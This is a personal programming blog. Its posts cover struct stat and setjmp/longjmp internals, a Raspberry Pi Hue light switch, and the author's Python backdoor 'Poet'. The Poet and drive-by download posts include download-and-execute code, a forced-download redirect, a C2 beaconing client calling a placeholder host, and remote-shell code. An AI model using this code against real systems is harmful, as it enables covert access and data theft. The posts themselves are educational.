Note: i’m going to try a significantly more informal blogging style
struct stat on Linux is pretty interesting
the struct definition in the man page is not exactly accurate
glibc explicitly pads the struct with unused members, which is interesting. I guess it's to reserve space for future expansion of fields
if you want to see the real definition, a trick you can use is writing a test program that uses a struct stat, compiling with -E to stop after preprocessing, then looking in that output for the definition
you can look in the glibc sources and the linux sources and see that they actually have to make their struct definitions match! (i think). since kernel space is populating the struct memory and userspace is using it, they need to agree exactly on where each member is
you can find some snarky comments in linux about the padding, which is pretty funny. for example (arch/arm/include/uapi/asm/stat.h)
because the structs are explicitly padded, you really need to use designated initializers when initializing one. if you use plain positional initializers instead, some of your values will land in the unused padding members rather than the fields you wanted!
Pretty recently I learned about setjmp() and longjmp(). They’re a
neat pair of libc functions which allow you to save your program’s current
execution context and resume it at an arbitrary point in the future (with
some caveats [1]).
If you’re wondering why this is particularly useful, to quote
the manpage, one of their main use cases
is “…for dealing with errors and
interrupts encountered in a low-level subroutine of a program.” These functions
can be used for more sophisticated error handling than simple error
code return values.
I was curious
how these functions worked, so I decided to take a look
at musl libc’s
implementation for x86.
First, I’ll explain their interfaces and show an example usage program.
Next, since this post isn’t aimed at the assembly wizard, I’ll cover some
basics of x86 and Linux calling convention to provide some required background
knowledge.
Lastly, I’ll walk through the source, line by line.
Interfaces
```c
int setjmp(jmp_buf env);
```
setjmp() takes a single jmp_buf opaque type, returns 0, and continues
execution afterward normally. A jmp_buf is the
structure that setjmp() will save the calling execution context in. We’ll
examine it more closely later on.
```c
void longjmp(jmp_buf env, int val);
```
longjmp() takes a jmp_buf and an int, simply returning back the given
int value (unless it was 0, in which case it returns 1). The unusual aspect
is that when it returns, the program’s execution resumes as if setjmp() had
just been called. This allows the user to jump back an arbitrary amount of
frames on the current call stack (presumably out of some deep routine which had
an error). The return value allows the code following the setjmp() call to
differentiate if setjmp() or longjmp() had just been called, and proceed
accordingly.
Here’s a simple example.
```c
#include <setjmp.h>
#include <stdio.h>

void fancy_func(jmp_buf env);

int main()
{
    jmp_buf env;
    int ret = setjmp(env);
    if (ret == 0) {
        puts("just returning from setjmp!");
        fancy_func(env);
    } else {
        puts("now returning from longjmp and exiting!");
    }
}

void fancy_func(jmp_buf env)
{
    puts("doing fancy stuff");
    longjmp(env, 1);
}
```
The above code creates a jmp_buf and calls setjmp(), saving the current
execution context. Since setjmp() returns 0, the code follows the
first branch, calling fancy_func() and
forwarding on the jmp_buf. fancy_func() does some fancy stuff, then calls
longjmp(), passing in the jmp_buf and 1. Execution returns to the if statement following the setjmp() call, except this time, ret is 1 instead of 0, because we're returning from longjmp(). Now the code follows the else path, which prints and exits. [2]
Background Knowledge
I’ve mentioned “execution context” a few times, but let’s make that a little
more concrete. In this case, a program’s execution context can be defined by
the state of the processor’s registers.
On x86, the relevant registers are the general purpose, index, and pointer
registers.
ebx, ecx, edx, esi, and edi don't have particularly special meaning here and can be thought of as arbitrary 32-bit storage locations. However, eax, ebp, and eip are a little different.
eax is used for function return values (specified by the
cdecl calling
convention)
ebp, the frame pointer, contains a pointer to the start of the current stack
frame.
eip, the instruction pointer, contains a pointer to the next instruction to
execute.
With this in mind, I initially thought that a jmp_buf would be an array
of 9 ints or something, in order to hold each register.
As it happens, jmp_buf is instead declared as (link):
I had never seen this syntax of using bracket operators at the end of a typedef
but searched and found out that the __jmp_buf declaration
declares a fixed size array of 6 unsigned longs, and the jmp_buf declaration
declares an array of 1 struct __jmp_buf_tag. The reason for the array of 1
is so the pointer semantics of arrays kick in and the struct __jmp_buf_tag
is actually passed by reference in calls to setjmp()/longjmp() (as opposed
to being copied).
Anyway, apparently my guess of 9 ints was incorrect, and it’s actually 6 (longs).
Before we
can dig into the source to understand why this is,
we need to understand what the state of
the program stack is at the point setjmp() is called, and to do that, we need
to understand
which calling convention is being used. Since we assume x86 Linux, this will
be cdecl. The
relevant parts of cdecl for this case are:
arguments passed on the stack
integer values and memory addresses returned in eax (as mentioned above)
eax, ecx, edx are caller saved, the rest are callee saved
setjmp()'s code executes immediately after the caller's call instruction, so at the point the first instruction of setjmp() executes, the stack looks something like this.
```
> high memory <
|            ...            |
| caller's caller saved eip |
| caller's caller saved ebp | < ebp
| caller stack var 1        |   // caller's stack frame
| caller stack var 2        |
| caller stack var ...      |
| caller stack var n        |
| pointer to jmp_buf        |   // argument to setjmp
| caller saved eip          | < esp
+---------------------------+   // setjmp's stack frame
> low memory <
```
(In this illustration, the stack grows down.)
At the top of the stack is the eip value that the call instruction pushed,
or where to return to after setjmp() finishes. Above that is the first and only argument, the pointer to the given jmp_buf. Lastly, above that is
the caller’s stack frame.
esp points to the top
of the stack as usual, and ebp is still pointing to the start of the caller’s
stack
frame. Usually the first thing a function does is push
ebp on the stack, and set ebp to esp to now point to the current stack frame (a.k.a the prologue),
but since setjmp() is such a minimal function, it doesn’t do this.
Furthermore, since ebp is one of the registers that needs to be saved, setjmp()
needs it to be unperturbed.
After setjmp() returns, the stack is nearly identical, except that eip has been popped off the stack, and execution continues at the next instruction after the caller's call setjmp. esp has also been updated accordingly. This is the state of the program that setjmp() will need to record, and that longjmp() will restore.
Before reading the source I tried to reason about what I expected would happen.
I presume:
General purpose and index registers (eax, ebx, ecx, edx, esi, edi) which don’t
have any effect on control flow can be trivially saved and restored
ebp can similarly be saved “as is”, since its value when
setjmp() executes is exactly what it needs to be restored to in longjmp()
esp cannot be saved “as is” because when setjmp() executes, there is the
extra eip on the stack that is not there after the function returns. Therefore,
the value for esp that should be saved is esp+4 to match the expected
state of the stack after return
The eip that should be saved is the address of the instruction after the
call setjmp instruction, which can be retrieved from the top of the
stack by dereferencing esp
With all that out of the way, let’s read the source (all annotations by me)
(link).
Since this type of low level register manipulation isn’t available from C
(modulo compiler intrinsics), both of these functions are necessarily written
in assembly.
The first line retrieves the argument off the stack, placing a pointer to the jmp_buf (remember, an array of 6 unsigned longs) in eax. It then moves ebx, esi, edi, and ebp "as is" into the array. It adds 4 to esp with a lea and
stores that next. Next, it dereferences esp and stores that in the last slot
in the array. Lastly, it zeroes out eax and returns.
The final state of the jmp_buf after setjmp() returns: slots 0 through 3 hold ebx, esi, edi, and ebp, slot 4 holds esp+4, and slot 5 holds the saved return eip. Now on to longjmp().
The first two lines retrieve the arguments (pointer to jmp_buf, int return
val) from the stack into edx and eax, respectively. The int val is
incremented to 1 if it is 0, according to the spec. Next, ebx, esi, edi, and
ebp are reset
to their saved state, stored in the jmp_buf, in a straightforward manner.
As you can see, both setjmp() and longjmp() need to precisely agree on
where each particular register is saved in the jmp_buf.
esp is mysteriously restored in an indirect manner, via ecx [3], and finally, eip is reset to the saved state via an indirect jump.
So I was mostly correct, but it seems like eax, ecx, and edx were not saved
in the jmp_buf!
If we look back on the details of cdecl, it becomes clear why.
eax doesn’t need to be saved, because it is reserved for the return value
ecx and edx are caller saved. This means that a callee subroutine is
free to trash these registers, and it is the responsibility of the caller
to save and restore them after the subroutine returns. Because of this,
if the function that calls setjmp() needs to use ecx or edx after the
call, it will already have code to save and restore those registers before
and after the function call. Since longjmp() resumes execution as if
setjmp() had immediately returned, execution will automatically hit the
code that restores ecx and edx, making it unnecessary to save them in the
jmp_buf.
This is just one example of how great musl libc is at providing an
understandable resource for learning the internals of systems software. I
often find myself referencing it when I’m curious about libc internals, and
if you’re not familiar with it, I highly recommend checking it out!
[1] Mainly, that the function which called setjmp() cannot have returned before the corresponding longjmp() call.
[2] A slight aside: This situation where a function returns different values based on the execution context also appears in fork(), in which the caller uses the return value to differentiate whether it is now executing in the child or parent process.
[3] I actually have no good explanation for this and am pretty curious why it's done this way. Something like mov $esp, [$edx+16] is a perfectly valid instruction (tested with rasm2)! I asked on the musl mailing list, but no one responded :(. If you have an explanation, please let me know!
This is a pretty late post, but I wanted to show off the hardware I designed
as a follow up to the first
“Building a Simple IoT Light Switch”.
In that post I presented a prototype of a smart light switch I designed that
consisted of a button which triggered a small Python server running on a
Raspberry Pi to control my Philips Hue lights over an HTTP API. It was an extraordinarily simple design that worked well enough, but it was very inconvenient to transport since I had to rewire the breadboard to the raspi GPIO pins every time I moved. Since the design seemed production ready for my needs, I decided to solve this problem by using it as an opportunity to learn PCB design and actually design a production board.
Special thanks go to Nick Kubasti for teaching me
how to use KiCad and to John Sullivan for helping
me with the final lab work.
The basic circuit I designed is below. It is merely a GPIO pin hooked up to
ground with a switch in between, and an LED and resistor for fun.
The code behind this configures the GPIO pin to use a pull up resistor, which
pulls the pin’s voltage up to VCC when the button is not pressed, and down to
GND when it is. This lets the code poll for when the pin’s value is False.
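As a rough sketch (not the exact code from the original post), the pull-up-plus-polling approach with the RPi.GPIO library looks something like this; the pin number and sleep interval are just placeholders:

```python
import time
import RPi.GPIO as gpio

PIN = 17  # BCM numbering for board pin 11

gpio.setmode(gpio.BCM)
gpio.setup(PIN, gpio.IN, pull_up_down=gpio.PUD_UP)  # internal pull up resistor

while True:
    if not gpio.input(PIN):  # reads False while the button is held down
        print 'button pressed'
    time.sleep(0.1)
```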
A more complete schematic including the pull up resistor is below. Note that
I won’t have to implement the pull up part in my design because the Raspberry
Pi implements that internally.
My initial idea was to have a little board that would plug straight down into
the Pi’s GPIO male headers with a little button and LED at the end. However,
that was really wasteful since that would block all of the pins even though
I was only using three of them (input, GND, VCC). Nick suggested a board design
that had two sets of headers: one set of female ones for plugging downwards as I
had originally thought, and one set of male ones facing upward that all the
unused pins would be forwarded to. This way, even though the downward facing
female pins are all plugged in, they can all still be accessed since the board
traces simply connect the unused female pins to the corresponding male ones.
The exception to this is GPIO pin 11, which is the one actually being used for
the switch. I just need to remember for future projects that pin 11 is
reserved. That was probably really hard to understand, so here’s the schematic,
created with KiCad.
On the left you can see the two sets of 13 x 2 headers. The ones on the left
will be the female ones that plug downward into the Pi’s male headers. The
ones on the right will be the male ones that can be used for other projects.
All those wires going around the top and bottom are the forwarded connections.
The one pin exclusively in use on the left is pin 11, which is connected to
the circuit. All the rest are unused, and wires are used to connect them to
their corresponding male header. Pins 1 and 9 are technically in use, but
since they correspond to VCC and GND, it’s fine to forward them too.
The actual circuit is in the bottom left. It’s very similar to the above
circuit diagrams, pin 11 is connected to GND (pin 9) via a switch, and
3.3V VCC (pin 1) is connected to an LED, resistor, and the same GND (pin 9).
The next step after creating the schematic, and assigning actual parts to each
of the components, was to design the printed circuit board (PCB). This involves
laying out the components as they will appear on the physical board.
This was a completely new area to me and it was challenging and fun to
actually draw out the board’s traces, taking care not to intersect them,
and using the different layers when necessary. You might notice that there’s
a seemingly random set of 1 x 2 headers in the middle of the area where the
switch goes. I added those because I noticed that the button and LED were going
to actually extend off the end of the Pi. I was concerned about how pressing
down on the button would actually flip the Pi a little bit, so Nick had an
incredible idea and suggested adding space for a pair of dud headers that
could be used as legs to support the end of the PCB that hung off the side
of the Pi.
After this, I was then able to pretty easily use KiCad to generate some
Gerber files to send to the fab. I chose to use
OshPark based on Nick’s recommendation, and they turned
out to be a great option. I was able to get three copies of my board, with
free shipping for <$8!
After waiting a couple of weeks for the boards to come in, John helped me
solder everything together to finish up this project. During this process
we noticed one design mistake: the layout of the switch was actually way
too big for the switch we had on hand, but that didn’t turn out to be a serious
issue.
Thanks for reading! I have two extra boards I’m not doing anything with, so
if you happen to have a Raspberry Pi and some Hue lights, I’d be happy to give
you the hardware and software for your own DIY light switch.
This post is about an interesting race condition bug I ran into a while ago while working on a small feature improvement for poet.
In particular, I was improving the download-and-execute capability of poet
which, if you couldn’t tell, downloads a file from the internet and executes
it on the target. At the original time of writing, I didn’t know about
the python tempfile module and since I recently learned about it, I wanted
to integrate it into poet as it would be a significant improvement to
the original implementation. The initial patch looked like this.
```python
r = urllib2.urlopen(inp.split()[1])
with tempfile.NamedTemporaryFile() as f:
    f.write(r.read())
    os.fchmod(f.fileno(), stat.S_IRWXU)
    f.flush()  # ensure that file was actually written to disk
    sp.Popen(f.name, stdout=open(os.devnull, 'w'), stderr=sp.STDOUT)
```
This code downloads a file from the internet, writes it to a tempfile on disk, sets the permissions to executable, and executes it in a subprocess.
In testing this code, I observed some puzzling behavior: the file was never actually getting executed because it was suddenly ceasing to exist! I noticed that when I used subprocess.call() or called .wait() on the Popen(), it would work fine. However, I intentionally didn't want the client to block while the file executed its arbitrary payload, so I couldn't use those functions.
The fact that the execution would work when the Popen call waited for the process and didn't work otherwise suggests a race between the time it takes to execute the child and the time it takes for the with block to end and delete the file, which is tempfile's default behavior. More specifically, the
file must have been deleted at some point before the exec syscall loaded
the file from disk into memory. Let’s take a look at the implementation of
subprocess.Popen() to see if we can gain some more insight:
```python
def _execute_child(self, args, executable, preexec_fn, close_fds,
                   cwd, env, universal_newlines,
                   startupinfo, creationflags, shell, to_close,
                   p2cread, p2cwrite,
                   c2pread, c2pwrite,
                   errread, errwrite):
    """Execute program (POSIX version)"""
    <snip>
    try:
        try:
            <snip>
            try:
                self.pid = os.fork()
            except:
                if gc_was_enabled:
                    gc.enable()
                raise
            self._child_created = True
            if self.pid == 0:
                # Child
                try:
                    # Close parent's pipe ends
                    if p2cwrite is not None:
                        os.close(p2cwrite)
                    if c2pread is not None:
                        os.close(c2pread)
                    if errread is not None:
                        os.close(errread)
                    os.close(errpipe_read)

                    # When duping fds, if there arises a situation
                    # where one of the fds is either 0, 1 or 2, it
                    # is possible that it is overwritten (#12607).
                    if c2pwrite == 0:
                        c2pwrite = os.dup(c2pwrite)
                    if errwrite == 0 or errwrite == 1:
                        errwrite = os.dup(errwrite)

                    # Dup fds for child
                    def _dup2(a, b):
                        # dup2() removes the CLOEXEC flag but
                        # we must do it ourselves if dup2()
                        # would be a no-op (issue #10806).
                        if a == b:
                            self._set_cloexec_flag(a, False)
                        elif a is not None:
                            os.dup2(a, b)
                    _dup2(p2cread, 0)
                    _dup2(c2pwrite, 1)
                    _dup2(errwrite, 2)

                    # Close pipe fds.  Make sure we don't close the
                    # same fd more than once, or standard fds.
                    closed = {None}
                    for fd in [p2cread, c2pwrite, errwrite]:
                        if fd not in closed and fd > 2:
                            os.close(fd)
                            closed.add(fd)

                    if cwd is not None:
                        os.chdir(cwd)

                    if preexec_fn:
                        preexec_fn()

                    # Close all other fds, if asked for - after
                    # preexec_fn(), which may open FDs.
                    if close_fds:
                        self._close_fds(but=errpipe_write)

                    if env is None:
                        os.execvp(executable, args)
                    else:
                        os.execvpe(executable, args, env)

                except:
                    exc_type, exc_value, tb = sys.exc_info()
                    # Save the traceback and attach it to the exception object
                    exc_lines = traceback.format_exception(exc_type,
                                                           exc_value,
                                                           tb)
                    exc_value.child_traceback = ''.join(exc_lines)
                    os.write(errpipe_write, pickle.dumps(exc_value))

                    # This exitcode won't be reported to applications, so it
                    # really doesn't matter what we return.
                    os._exit(255)

            # Parent
            if gc_was_enabled:
                gc.enable()
        finally:
            # be sure the FD is closed no matter what
            os.close(errpipe_write)

        # Wait for exec to fail or succeed; possibly raising exception
        # Exception limited to 1M
        data = _eintr_retry_call(os.read, errpipe_read, 1048576)
    <snip>
```
The _execute_child() function is called by the subprocess.Popen class
constructor and implements child process execution. There’s a lot of
code here, but key parts to notice here are the os.fork() call which
creates the child process, and the relative lengths of the following
if blocks. The check if self.pid == 0 contains the code for executing
the child process and is significantly more involved than the code
for handling the parent process.
From this, we can deduce that when the subprocess.Popen() call executes
in my code, after forking, while the child is preparing to call
os.execve, the parent simply returns, and immediately exits the with
block. This automatically invokes the f.close() function which deletes
the temp file. By the time the child calls os.execve, the file has been
deleted on disk. Oops.
I fixed this by adding the delete=False argument to the
NamedTemporaryFile constructor to suppress the auto-delete functionality.
Of course this means that the downloaded files will have to be cleaned up
manually, but this allows the client to not block when executing the file
and have the code still be pretty clean.
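For reference, here's a sketch of the snippet with that change applied (illustrative, not necessarily the exact patch):

```python
r = urllib2.urlopen(inp.split()[1])
with tempfile.NamedTemporaryFile(delete=False) as f:
    f.write(r.read())
    os.fchmod(f.fileno(), stat.S_IRWXU)
    f.flush()
# with delete=False the file survives the end of the with block, so the
# child's exec can still find it on disk; cleanup now has to happen manually
sp.Popen(f.name, stdout=open(os.devnull, 'w'), stderr=sp.STDOUT)
```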
Main takeaway here: don’t try to Popen a NamedTemporaryFile as the
last statement in the tempfile’s with block.
Back in April, I won a free “.club” domain through gandi.net’s
anniversary prize giveaway. I really didn’t need
a “.club” domain in particular, so I thought it would be pretty fun to
register a stereotypical “sketchy” domain and set it up as a drive-by
download site or something, because while I’ve heard of doing this kind of
thing, I’ve never actually done it before. Here’s a blog post walking through
what I did. The usual disclaimer applies here: I did this purely for my
own education and learning experience and am not responsible for anything
you do with it.
Step 2: Force Download
This involves configuring your web server to automatically set the
Content-Type header of the resource you want to force download
to application/octet-stream. That should make most web browsers trigger
a download file prompt to actually download the file. Safari curiously
doesn’t support prompts for downloaded file location like Chrome and Firefox,
so in that case, it will immediately download the file to ~/Downloads.
I'm going to try to force a drive-by download of a jpg file, so I added a couple of lines to my .htaccess file in Apache's DocumentRoot that set the Content-Type for the image to application/octet-stream. That will force browsers to download the image, rather than rendering it, when a browser tries to access http://freemoviedownload.club/image.jpg, for example.
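A quick way to sanity check that the header is actually being forced (just a sketch using the example URL above):

```python
import requests

resp = requests.head('http://freemoviedownload.club/image.jpg')
print resp.headers.get('Content-Type')  # should print: application/octet-stream
```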
At this point, we’re technically done. We can send someone a link to a file
and, assuming they say yes to the prompt (or use Safari), download it to their
computer. But for some extra polish, I want to have an actual website with
content and have the download come from that page.
Step 3: Redirect
We can accomplish this with a trivial Javascript redirect that executes
after the page has loaded. We can even add a delay before the download happens
to give them time to read the website or whatever. The redirect will need
to be to the path configured in step 2, but this will give the illusion that
the download is coming from the index.html page.
index.html
```html
you have arrived at the official free movie download club! enjoy your download
<script type="text/javascript" charset="utf-8">
  function f() {
    document.location = 'dickbutt.jpg'
  }
  setTimeout(f, 2000);
</script>
```
That’s it! Anyone that browses to the website will automatically get a nice
“dickbutt.jpg” image downloaded to their machine. Again, particularly effective
against Safari and Chrome for Android, in my testing.
I’m lucky enough to own a Philips Hue wireless
lighting unit (thanks NUACM!) which essentially is
this really awesome Internet of Things (IoT) product that lets me replace
all my standard light bulbs with special RGB ones that can be controlled
wirelessly. The bulbs communicate via
ZigBee with a “Bridge” unit that
is connected to my local network and hosts an HTTP API for interfacing
with the lights. This API is used by the official Hue mobile app for controlling
the lights, but is also publicly documented and totally hacker friendly.
The lights are awesome, but it is a bit of a drag to have to use an app
to turn them all off rather than having some physical switch [1], so I decided
to fully embrace the IoT trend and use my Raspberry Pi to build a simple
HTTP-fluent light switch for turning my lights on and off.
Hardware
The circuitry itself is literally as simple as it gets for this kind of thing: all I have is GPIO pin 11 on the board (BCM pin 17) connected to pin 6 (GND),
with a switch in between. In my code, I’ll configure pin 17 to use an internal
pull up resistor which will bring the voltage up to 3.3V when the button is not
pressed and down to 0V when it is.
Software
The Raspberry Pi Python library makes it really easy to control circuits. For
simplicity, my code uses a polling approach to detect when the button is pressed
but the RPi library also supports real callbacks using threading.
```python
def main():
    while True:
        inp = gpio.input(PIN)
        # pull up resistor will cause inp to be True when button is not
        # pressed and False when button is pressed
        if not inp:
            callback()
        time.sleep(BUTTON_SLEEP)
```
My callback() function consists of code that uses the Hue API to request
a diagnostic of the lights, which comes back as a JSON blob with each light
represented as an object. If no lights are on, it turns them on, otherwise
turning them all off. Turning the lights on and off is as simple as submitting
a PUT request to the API endpoint for each light with a JSON blob specifying
the state to turn to (On=True, Off=False).
```python
def callback():
    survey = requests.get(BASE + '/lights')
    survey = json.loads(survey.text)
    numlights = len(survey)
    # if any are on, turn all off.
    if any([survey[str(x)]['state']['on'] for x in range(1, numlights + 1)]):
        for light in survey.keys():
            turn(light, False)
        print '[{}] Off'.format(datetime.datetime.now())
    else:
        # else if all are off, then all on
        for light in survey.keys():
            turn(light, True)
        print '[{}] On'.format(datetime.datetime.now())

def turn(light, state):
    data = json.dumps({'on': state})
    requests.put(BASE + '/lights/{}/state'.format(light), data=data)
```
That’s it! I leave the script running in a tmux pane on the Pi and I can
hit the button at any point to toggle the lights on and off. The full code
is available on github.
For future work,
it would be cool to integrate RF chips so the button wouldn’t have to be
physically attached to the Pi and I could have a little remote control. I’ll
leave that for another day. Thanks for reading, here it is in action!
[1] Of course I could physically go to each light and flip the switch but manually turning off all three lights in my room is even more work than launching the app.
For the past eight months or so, I’ve been working sporadically on a side
project of mine I call Poet. Poet is
basically a tool for hackers that’s useful for post exploitation, that is,
after you’ve initially exploited and gotten access to the computer you’re
not supposed to have access to. Poet is useful because it essentially acts as
a backdoor you can install into a system to help you maintain access once
you’ve gotten your foot in the door.
As a disclaimer, I am building Poet purely for my own education and learning experience.
The code is freely available because I think it might be useful to others interested
in learning about this sort of thing. Use it responsibly.
I’ve learned a lot during the process of
building this tool and I thought it would be cool to write a blog post (possibly
more to come)
documenting that process.
Motivation
The initial motivation for this project came from an experience I had
participating in the 2014 Northeast Collegiate Cyber Defense Competition. In
short, the competition requires a team of students to protect a small
business IT infrastructure from a red team of hackers. Usually the red team
is really good and completely owns you at some point or other throughout
the competition, and at the end they tell you what they did and give
you tips on how to improve. In particular, the red team told us that there
was pre-installed “beaconing” malware on many of our systems from the start
of the competition that would “phone home” to a command and control (C2) server
every once in a while to get commands and tasks to execute on the target
system. This idea was pretty interesting to me, and a basic implementation
didn’t actually seem too hard to write, so I decided to give it a try, even
though at this point, I had no experience with network programming.
v0.1
The first version of Poet was drastically different from the current form
and was just about as simple and primitive as it gets for something
like this. In this version, the client program (executed on target) would
repeatedly attempt to connect to a socket (port 80 by default) on the server (attacker’s C2 server)
at a specified interval. If the connection failed (server
wasn’t running), the client would sleep, otherwise it would execute
a command sent from the server, sending back the stdout of the command.
The
server simply maintained a queue of commands to execute and would one
by one pop them off the queue and send them to the client, printing out the stdout
when it came back.
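As an illustration (this is a sketch of the design described above, not the actual v0.1 source; the host, port, and interval are made up), the client loop boiled down to something like:

```python
import socket
import subprocess
import time

SERVER, PORT, INTERVAL = 'c2.example.com', 80, 60

while True:
    try:
        s = socket.create_connection((SERVER, PORT))
    except socket.error:
        time.sleep(INTERVAL)  # server isn't up: sleep and try again later
        continue
    cmd = s.recv(4096)  # command to execute on the target
    output = subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
    s.send(output)  # send the command's stdout back to the server
    s.close()
    time.sleep(INTERVAL)
```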
This was a great exercise
to learn the basics of socket programming, but of course
wasn’t very useful at all, for a number of reasons. First, ideally the client’s
interval is very large so as to minimize network use and
remain stealthy but that puts a hard limit on the rate at which
commands can be executed. This system was also very inflexible because there
was no way to reorder or edit commands in the queue, since the “user
interface” was just a server script that was run with the commands to execute
as arguments. Overall, a good start,
but there was definitely much work ahead to actually make this a semi-realistic tool.
v0.2
The second version of Poet involved a pretty substantial redesign although
one of the things to stay the same would be the high
level client/server beaconing dynamic. This is far superior to having the
client attempt to listen on the target’s end because in any sort of “real”
scenario, the target will likely be behind a firewall that will reject
incoming packets on arbitrary ports.
The beaconing model will allow the tool
to bypass most standard firewalls that aren’t specifically targeting it because
outbound port 80 traffic is almost certainly
allowed. I later changed the default port to 443 because it’s just as
likely to be allowed out and because it could potentially avoid packet inspection,
since traffic on 443 is usually encrypted.
Building on top of this model, there were a couple other brainstorms I had
to build on top of v0.1. Instead of executing a single command for every ping,
what about sending over multiple commands? What about a pastebin/gist URL to
a script that the client
would download and execute? These would help solve the rate limit problem
because an arbitrary number of commands, instead of one, could be executed
for each ping. What about user interface?
What about creating an actual web user interface
for managing the command queue that the client was pulling from each ping?
This would help solve the flexibility problem.
While these would be relatively simple to add to v0.1,
if I asked myself, “If I were a hacker, would I
want to use this tool?” the answer would be “No way!” because I would only be able
to interact with my target system via discrete scripts, and I
would have to wait the ideally large time interval between pings to
get any sort of feedback on my actions.
This made it obvious that I would have to move
from a design where each ping from the client was an opportunity for the
user to run x actions on the target,
to a design where each ping from
the client was an opportunity for the user to interactively control the client
for an unlimited time,
and perform actions on the target with continuous feedback.
With this in mind, I opted to use a shell as the user interface on the server
side since it seemed simpler to implement and I was more familiar with
implementing a shell versus something like a web interface (which would
likely have to have a shell built into it anyway for executing commands).
The server design would be similar to that of v0.1 in that the server would
only be running when the user wanted to control the client, and the client
would use the inability to connect to the server as a sign to "go to sleep"
for another interval, although this isn’t strictly necessary. Another server design
I thought of would be an always-on model where the server would always answer
the client’s ping with some kind of binary state value, which would work equally
well, but wouldn’t be strictly necessary because state can be inferred as
described above.
In designing the actual protocol the client
and server use to communicate, I decided to
use HTTP to mildly obfuscate the client’s initial check if
the server is running. The client’s ping consists of a
GET request for /style.css on the server [1]. Of course, the server isn't
a real web server, but it temporarily masquerades as one for the purposes of
the initial handshake and sends back a hardcoded HTTP response of some random
css file, and launches the control shell for the user. At this point, the
protocol used is as simple as it gets: size of the following data + the data
itself. This being my first time doing socket programming, my implementation
was a little weird and reserved the first five bytes of the data sent over the
wire for the ASCII decimal representation of the size (¯\_(ツ)_/¯), but
hey, it worked.
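In other words, the framing amounted to something like this (a sketch, not the verbatim poet code):

```python
def send_msg(sock, data):
    # first five bytes are the ASCII decimal length, e.g. '00042', then the data
    sock.sendall('{:05d}'.format(len(data)) + data)

def recv_msg(sock):
    size = int(sock.recv(5))
    buf = ''
    while len(buf) < size:
        buf += sock.recv(size - len(buf))
    return buf
```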
The majority of the work left for v0.2 was essentially deciding on the features
that the control shell would have and implementing the “userland utilities”
or commands you could run at the shell. The commands I thought of and implemented
were:
exec: This was the first command I wrote. It executes one or more commands on
the target, sending the stdout of all of them back in one big chunk of text. I later
added a flag that would save the big chunk to a file in the archive directory.
Useful for stuff like grabbing process dumps.
recon: Basically like exec, but the commands are pre-selected and are tailored
towards “reconnaissance” purposes. Stuff like whoami, id, uname -a, w, etc.
shell: Launches an actual remote shell on the target (inside the original control shell). It was implemented really crudely in this version, with the execution backend on the client being a simple one-line subprocess call (shown in the v0.3 section below).
exfil: Exfiltrates files and saves them to the archive directory. Pretty standard.
Current implementation is pretty crude, and loads entire file into memory, rather
than paging the data somehow.
selfdestruct: Exit the client and delete script on disk. Without this,
the user would have to do something weird (nay, treasonous?) like
killing the client’s process from its own remote shell to completely
turn off the client.
dlexec: Download an executable from the internet and execute it. Also
pretty standard, useful for upgrading or installing additional tools on target
exit: Pretty self explanatory, this tells the client that the server’s
done for now and that the client can now go back to sleep and begin pinging
again in one time interval.
This work resulted in a decently functional prototype that could feasibly
be used for post-exploitation.
v0.3
Version 0.3 was a pretty arbitrary decision, but mostly involved significant
refactoring of the backend code, with a couple new user facing features.
One notable change was the refactoring of the entire codebase from imperative,
C-style programming to object oriented style, which gave the code much better
structure. The communications protocol was also slightly refactored to be
more standard by reserving the first four bytes for the binary data size value (see the sketch after this paragraph), which simultaneously conserved
bytes sent over the wire and increased the maximum data that could be sent in
one message between client and server. An additional shell command I implemented
was called chint, standing for “change interval”, which lets the server
change the client’s ping delay interval after the client’s been started.
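The new length prefix is the sort of thing Python's struct module handles directly; the send side of the framing becomes something like this (again, just a sketch):

```python
import struct

def send_msg(sock, data):
    # a four-byte big-endian binary length instead of five ASCII digits
    sock.sendall(struct.pack('!I', len(data)) + data)
```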
All that’s great, but the most significant set of improvements in my opinion
were related to fleshing out the remote shell feature. While it “worked”
to a decent degree for most standard commands there were two main problems with
it that kept it from being a “real” shell. For reference, here’s what the code
looked like for executing commands in v0.2.
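(The original snippet isn't reproduced here; based on the description that follows, it was essentially a one-liner along these lines.)

```python
output = sp.check_output(cmd, stderr=sp.STDOUT, shell=True)
```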
For those that aren’t as familiar with Python’s subprocess library, this
executes an arbitrary command line (cmd), sending the stderr to the stdout,
and returns any stdout of the command.
The first problem was that the shell
output was not continuous – when executing a command like ls -R /, which
typically results in lots of scrolling output in a normal terminal, my remote
shell would instead block on the server end while the client executed the
command to its completion and sent over the entire stdout as one big piece.
I solved this problem by adapting the code to continuously poll the
stdout file descriptor for new lines of output, sending those over individually
so that the server would get each line of output as soon as it was available.
The second problem was that if certain commands like ping were executed in the shell,
the client would effectively become unusable because ping (when executed
without the -c parameter) is usually ended by being sent an INT signal (SIGINT),
typically by hitting Ctrl-C on the keyboard. The problem is, the client side
had no mechanism to receive signals and send them to the running process, so
it would be eternally running this unending process and the user
would totally lose control of the target. To solve this problem, I needed a way for the
client to simultaneously execute the requested command, and listen for
messages from the server, presumably telling the client to end the running
process. To do this, I learned to use the select() function which is an
easy way for an application to multiplex data streams (in this case,
the stdout of the running process, and the socket connection to the server)
and process their data without requiring concurrency at the application
level.
The resulting code from these two fixes is below. Select takes in multiple
file descriptors (File objects in Python) and returns which ones
are readable (in this example). After it returns, I can check which file descriptors
it returned, and proceed accordingly. In the expected case where
we can read from the process’s stdout file descriptor, we get a line of
stdout from the process, forwarding it to the server immediately.
In the exceptional case where we can read from the socket, we receive the message,
making sure it contains the proper keyword to end the process (‘shellterm’)
and terminating the process if it does.
```python
proc = sp.Popen(inp, stdout=sp.PIPE, stderr=sp.STDOUT, shell=True)
while True:
    readable = select.select([proc.stdout, s.s], [], [], 30)[0]
    for fd in readable:
        if fd == proc.stdout:  # proc has stdout/err to send
            output = proc.stdout.readline()
            if output:
                s.send(output)
            else:
                return
        elif fd == s.s:  # remote signal from server
            sig = s.recv()
            if sig == 'shellterm':
                proc.terminate()
                return
```
That’s all for v0.3. Again, the v0.3 decision was pretty arbitrary and I ultimately
chose to ship it because all the other features I had lined up at
the time were
more labor intensive/experimental and I really wanted to get my fancy
new remote shell into master :D.
Future Work
At this point, I’m pretty satisfied with the state of the project, but as
always, there’s more work to be done. Here are some future features/ideas/improvements
that may or may not ever get implemented:
crypto: If anything, I’d say encrypted communications are the one thing
keeping this from being a really usable tool. Right now, communications are
sent in the clear essentially, although they are base64 encoded for the slightest
amount of obfuscation. Ideally I’d use Python’s ssl library, probably doing
something like hardcoding a server public key into the client. A solution
